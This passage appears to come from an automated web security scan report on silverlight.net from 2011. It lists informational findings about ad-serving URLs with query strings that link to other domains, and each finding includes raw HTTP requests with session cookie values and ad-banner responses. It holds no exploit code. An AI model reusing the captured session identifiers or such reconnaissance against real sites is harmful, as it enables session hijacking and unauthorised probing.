The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /adchain.html?ZoneID=401&Task=Get&ifr=true&SiteID=2 HTTP/1.1
Host: www.silverlight.net
Proxy-Connection: keep-alive
Referer: http://www.silverlight.net/getstarted/devices/windows-phone/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=dffchm455phi2oqm1taknp3x; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; s_cc=true; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//www.silverlight.net/getstarted/devices/windows-phone/%2526ot%253DA
If-None-Match: ""

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
ETag: ""
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:16:26 GMT
Content-Length: 392


<html><head></head><body><body bgcolor="#FFFFFF"><a href="http://ads.neudesicmediagroup.com/a.aspx?Task=Click&ZoneID=58&CampaignID=510&AdvertiserID=70&BannerID=390&SiteID=6&RandomNumber=2100389386&Keywords=" target="_Blank"><img src="http://ads.neudesicmediagroup.com/ads/DK-Google-728x90-Banner-01.jpg" width="728" height="90" alt="" align="Center" border="0"></a>
...[SNIP]...

22.468. http://www.silverlight.net/adchain.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.silverlight.net
Path:   /adchain.html

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /adchain.html?ZoneID=36&Task=Get&ifr=true&SiteID=2 HTTP/1.1
Host: www.silverlight.net
Proxy-Connection: keep-alive
Referer: http://www.silverlight.net/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=dffchm455phi2oqm1taknp3x

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
ETag: ""
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 15:10:59 GMT
Content-Length: 380


<html><head></head><body><body bgcolor="#FFFFFF"><a href="http://ads.asp.net/a.aspx?Task=Click&ZoneID=36&CampaignID=1882&AdvertiserID=57&BannerID=1779&SiteID=2&RandomNumber=244575900&Keywords=" target="_Blank"><img src="http://ads.asp.net/ads/Silverlight-AgData-SLfree.jpg" width="300" height="250" alt="Developer Express" align="Center" border="0"></a>
...[SNIP]...

22.469. http://www.silverlight.net/adchain.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.silverlight.net
Path:   /adchain.html

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /adchain.html?ZoneID=39&Task=Get&ifr=true&SiteID=2 HTTP/1.1
Host: www.silverlight.net
Proxy-Connection: keep-alive
Referer: http://www.silverlight.net/learn/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=dffchm455phi2oqm1taknp3x; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; s_cc=true; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/getstarted/devices/windows-phone/%2526pidt%253D1%2526oid%253Dhttp%25253A//www.silverlight.net/learn/%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
ETag: ""
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:16:30 GMT
Content-Length: 359


<html><head></head><body><body bgcolor="#FFFFFF"><a href="http://ads.asp.net/a.aspx?Task=Click&ZoneID=39&CampaignID=1898&AdvertiserID=124&BannerID=2613&SiteID=2&RandomNumber=193469040&Keywords=" target="_Blank"><img src="http://ads.asp.net/ads/1_LDN.videos.131.sil.gif" width="300" height="250" alt="" align="Center" border="0"></a>
...[SNIP]...

22.470. http://www.silverlight.net/adchain.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.silverlight.net
Path:   /adchain.html

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /adchain.html?ZoneID=389&Task=Get&ifr=true&SiteID=2 HTTP/1.1
Host: www.silverlight.net
Proxy-Connection: keep-alive
Referer: http://www.silverlight.net/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=dffchm455phi2oqm1taknp3x; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; s_cc=true; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/getstarted/%2526pidt%253D1%2526oid%253Dhttp%25253A//www.silverlight.net/%2526ot%253DA
If-None-Match: ""

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
ETag: ""
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:16:20 GMT
Content-Length: 378


<html><head></head><body><body bgcolor="#FFFFFF"><a href="http://ads.neudesicmediagroup.com/a.aspx?Task=Click&ZoneID=58&CampaignID=494&AdvertiserID=68&BannerID=431&SiteID=6&RandomNumber=1201623385&Keywords=" target="_Blank"><img src="http://ads.neudesicmediagroup.com/ads/WebUI_728x90.jpg" width="728" height="90" alt="" align="Center" border="0"></a>
...[SNIP]...

22.471. http://www.silverlight.net/adchain.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.silverlight.net
Path:   /adchain.html

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /adchain.html?ZoneID=401&Task=Get&ifr=true&SiteID=2 HTTP/1.1
Host: www.silverlight.net
Proxy-Connection: keep-alive
Referer: http://www.silverlight.net/getstarted/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=dffchm455phi2oqm1taknp3x; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; s_cc=true; s_sq=msstoslvnet%3D%2526pid%253Dforums.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//www.silverlight.net/getstarted/%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
ETag: ""
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 15:45:05 GMT
Content-Length: 380


<html><head></head><body><body bgcolor="#FFFFFF"><a href="http://ads.neudesicmediagroup.com/a.aspx?Task=Click&ZoneID=58&CampaignID=457&AdvertiserID=12&BannerID=432&SiteID=6&RandomNumber=1341442495&Keywords=" target="_Blank"><img src="http://ads.neudesicmediagroup.com/ads/2010_q4_728x90.gif" width="728" height="90" alt="" align="Center" border="0"></a>
...[SNIP]...

22.472. http://www.silverlight.net/adchain.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.silverlight.net
Path:   /adchain.html

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /adchain.html?ZoneID=36&Task=Get&ifr=true&SiteID=2 HTTP/1.1
Host: www.silverlight.net
Proxy-Connection: keep-alive
Referer: http://www.silverlight.net/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=dffchm455phi2oqm1taknp3x

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
ETag: ""
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 19:58:25 GMT
Content-Length: 381


<html><head></head><body><body bgcolor="#FFFFFF"><a href="http://ads.asp.net/a.aspx?Task=Click&ZoneID=36&CampaignID=1882&AdvertiserID=57&BannerID=1779&SiteID=2&RandomNumber=1951762302&Keywords=" target="_Blank"><img src="http://ads.asp.net/ads/Silverlight-AgData-SLfree.jpg" width="300" height="250" alt="Developer Express" align="Center" border="0"></a>
...[SNIP]...

22.473. http://www.silverlight.net/adchain.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.silverlight.net
Path:   /adchain.html

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /adchain.html?ZoneID=401&Task=Get&ifr=true&SiteID=2 HTTP/1.1
Host: www.silverlight.net
Proxy-Connection: keep-alive
Referer: http://www.silverlight.net/getstarted/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=dffchm455phi2oqm1taknp3x; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; s_cc=true; s_sq=msstoslvnet%3D%2526pid%253Dforums.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//www.silverlight.net/getstarted/%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
ETag: ""
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 19:58:27 GMT
Content-Length: 385


<html><head></head><body><body bgcolor="#FFFFFF"><a href="http://ads.neudesicmediagroup.com/a.aspx?Task=Click&ZoneID=58&CampaignID=515&AdvertiserID=31&BannerID=440&SiteID=6&RandomNumber=547451066&Keywords=" target="_Blank"><img src="http://ads.neudesicmediagroup.com/ads/winforms_1110_728x90.gif" width="728" height="90" alt="" align="Center" border="0"></a>
...[SNIP]...

22.474. http://www.silverlight.net/adchain.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.silverlight.net
Path:   /adchain.html

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /adchain.html?ZoneID=401&Task=Get&ifr=true&SiteID=2 HTTP/1.1
Host: www.silverlight.net
Proxy-Connection: keep-alive
Referer: http://www.silverlight.net/getstarted/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=dffchm455phi2oqm1taknp3x; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; s_cc=true; s_sq=msstoslvnet%3D%2526pid%253Dforums.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//www.silverlight.net/getstarted/%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
ETag: ""
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 17:15:48 GMT
Content-Length: 379


<html><head></head><body><body bgcolor="#FFFFFF"><a href="http://ads.neudesicmediagroup.com/a.aspx?Task=Click&ZoneID=58&CampaignID=454&AdvertiserID=12&BannerID=432&SiteID=6&RandomNumber=185348024&Keywords=" target="_Blank"><img src="http://ads.neudesicmediagroup.com/ads/2010_q4_728x90.gif" width="728" height="90" alt="" align="Center" border="0"></a>
...[SNIP]...

22.475. http://www.silverlight.net/adchain.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.silverlight.net
Path:   /adchain.html

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /adchain.html?ZoneID=401&Task=Get&ifr=true&SiteID=2 HTTP/1.1
Host: www.silverlight.net
Proxy-Connection: keep-alive
Referer: http://www.silverlight.net/getstarted/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=dffchm455phi2oqm1taknp3x; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; s_cc=true; s_sq=msstoslvnet%3D%2526pid%253Dforums.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//www.silverlight.net/getstarted/%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
ETag: ""
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 01:25:49 GMT
Content-Length: 391


<html><head></head><body><body bgcolor="#FFFFFF"><a href="http://ads.neudesicmediagroup.com/a.aspx?Task=Click&ZoneID=58&CampaignID=509&AdvertiserID=70&BannerID=390&SiteID=6&RandomNumber=559178174&Keywords=" target="_Blank"><img src="http://ads.neudesicmediagroup.com/ads/DK-Google-728x90-Banner-01.jpg" width="728" height="90" alt="" align="Center" border="0"></a>
...[SNIP]...

22.476. http://www.silverlight.net/adchain.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.silverlight.net
Path:   /adchain.html

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /adchain.html?ZoneID=389&Task=Get&ifr=true&SiteID=2 HTTP/1.1
Host: www.silverlight.net
Proxy-Connection: keep-alive
Referer: http://www.silverlight.net/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=dffchm455phi2oqm1taknp3x

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
ETag: ""
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:14:48 GMT
Content-Length: 384


<html><head></head><body><body bgcolor="#FFFFFF"><a href="http://ads.neudesicmediagroup.com/a.aspx?Task=Click&ZoneID=58&CampaignID=515&AdvertiserID=31&BannerID=368&SiteID=6&RandomNumber=1141796034&Keywords=" target="_Blank"><img src="http://ads.neudesicmediagroup.com/ads/charts_1110_728x90.gif" width="728" height="90" alt="" align="Center" border="0"></a>
...[SNIP]...

22.477. http://www.silverlight.net/adchain.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.silverlight.net
Path:   /adchain.html

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /adchain.html?ZoneID=37&Task=Get&ifr=true&SiteID=2 HTTP/1.1
Host: www.silverlight.net
Proxy-Connection: keep-alive
Referer: http://www.silverlight.net/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=dffchm455phi2oqm1taknp3x

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
ETag: ""
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:14:48 GMT
Content-Length: 365


<html><head></head><body><body bgcolor="#FFFFFF"><a href="http://ads.asp.net/a.aspx?Task=Click&ZoneID=37&CampaignID=1887&AdvertiserID=2&BannerID=2555&SiteID=2&RandomNumber=1776744983&Keywords=" target="_Blank"><img src="http://ads.asp.net/ads/SL-Dec-Jan-SL-WPF-DataChart.jpg" width="300" height="250" alt="" align="Center" border="0"></a>
...[SNIP]...

22.478. http://www.silverlight.net/adchain.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.silverlight.net
Path:   /adchain.html

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /adchain.html?ZoneID=36&Task=Get&ifr=true&SiteID=2 HTTP/1.1
Host: www.silverlight.net
Proxy-Connection: keep-alive
Referer: http://www.silverlight.net/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=dffchm455phi2oqm1taknp3x

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
ETag: ""
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 01:25:49 GMT
Content-Length: 380


<html><head></head><body><body bgcolor="#FFFFFF"><a href="http://ads.asp.net/a.aspx?Task=Click&ZoneID=36&CampaignID=1882&AdvertiserID=57&BannerID=1779&SiteID=2&RandomNumber=950850400&Keywords=" target="_Blank"><img src="http://ads.asp.net/ads/Silverlight-AgData-SLfree.jpg" width="300" height="250" alt="Developer Express" align="Center" border="0"></a>
...[SNIP]...

22.479. http://www.silverlight.net/adchain.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.silverlight.net
Path:   /adchain.html

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /adchain.html?ZoneID=389&Task=Get&ifr=true&SiteID=2 HTTP/1.1
Host: www.silverlight.net
Proxy-Connection: keep-alive
Referer: http://www.silverlight.net/getstarted/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=dffchm455phi2oqm1taknp3x; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; s_cc=true; s_sq=msstoslvnet%3D%2526pid%253Dlogin.silverlight.net/login/signin.aspx%2526pidt%253D1%2526oid%253Dhttp%25253A//www.silverlight.net/getstarted/%2526ot%253DA
If-None-Match: ""

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
ETag: ""
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:18:37 GMT
Content-Length: 387


<html><head></head><body><body bgcolor="#FFFFFF"><a href="http://ads.neudesicmediagroup.com/a.aspx?Task=Click&ZoneID=58&CampaignID=496&AdvertiserID=14&BannerID=430&SiteID=6&RandomNumber=629773184&Keywords=" target="_Blank"><img src="http://ads.neudesicmediagroup.com/ads/LDN.videos.728.131.gen.gif" width="728" height="90" alt="" align="Center" border="0"></a>
...[SNIP]...

22.480. http://www.silverlight.net/adchain.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.silverlight.net
Path:   /adchain.html

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /adchain.html?ZoneID=389&Task=Get&ifr=true&SiteID=2 HTTP/1.1
Host: www.silverlight.net
Proxy-Connection: keep-alive
Referer: http://www.silverlight.net/getstarted/devices/windows-phone/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=dffchm455phi2oqm1taknp3x; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; s_cc=true; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//www.silverlight.net/getstarted/devices/windows-phone/%2526ot%253DA
If-None-Match: ""

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
ETag: ""
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:16:26 GMT
Content-Length: 531


<html><head></head><body><body bgcolor="#FFFFFF"><!-- begin ZEDO for channel: Neudesic , publisher: Neudesic , Ad Dimension: Super Banner - 728 x 90 -->
<script language="JavaScript">
var zflag_ni
...[SNIP]...
</script>
<script language="JavaScript" src="http://d2.zedo.com/jsc/d2/fo.js"></script>
...[SNIP]...

22.481. http://www.silverlight.net/adchain.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.silverlight.net
Path:   /adchain.html

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /adchain.html?ZoneID=38&Task=Get&ifr=true&SiteID=2 HTTP/1.1
Host: www.silverlight.net
Proxy-Connection: keep-alive
Referer: http://www.silverlight.net/getstarted/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=dffchm455phi2oqm1taknp3x; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; s_cc=true; s_sq=msstoslvnet%3D%2526pid%253Dforums.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//www.silverlight.net/getstarted/%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
ETag: ""
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:16:13 GMT
Content-Length: 358


<html><head></head><body><body bgcolor="#FFFFFF"><a href="http://ads.asp.net/a.aspx?Task=Click&ZoneID=38&CampaignID=1848&AdvertiserID=12&BannerID=2631&SiteID=2&RandomNumber=679233036&Keywords=" target="_Blank"><img src="http://ads.asp.net/ads/wijmo_charts_300x250.png" width="300" height="250" alt="" align="Center" border="0"></a>
...[SNIP]...

22.482. http://www.silverlight.net/adchain.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.silverlight.net
Path:   /adchain.html

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /adchain.html?ZoneID=401&Task=Get&ifr=true&SiteID=2 HTTP/1.1
Host: www.silverlight.net
Proxy-Connection: keep-alive
Referer: http://www.silverlight.net/showcase/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=dffchm455phi2oqm1taknp3x; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; s_cc=true; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/learn/%2526pidt%253D1%2526oid%253Dhttp%25253A//www.silverlight.net/showcase/%2526ot%253DA
If-None-Match: ""

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
ETag: ""
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:16:33 GMT
Content-Length: 406


<html><head></head><body><body bgcolor="#FFFFFF"><a href="http://ads.neudesicmediagroup.com/a.aspx?Task=Click&ZoneID=58&CampaignID=482&AdvertiserID=59&BannerID=297&SiteID=6&RandomNumber=504513452&Keywords=" target="_Blank"><img src="http://ads.neudesicmediagroup.com/ads/Spread%20728x90.gif" width="728" height="90" alt="Advertisement - Grape City" align="Center" border="0"></a>
...[SNIP]...

22.483. http://www.silverlight.net/getstarted/devices/details.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.silverlight.net
Path:   /getstarted/devices/details.aspx

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /getstarted/devices/details.aspx?__vanityfilename=windows-phone HTTP/1.1
Host: www.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/getstarted/%2526pidt%253D1%2526oid%253Dhttp%25253A//www.silverlight.net/showcase/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=dffchm455phi2oqm1taknp3x;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 17510
Content-Type: text/html; charset=utf-8
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
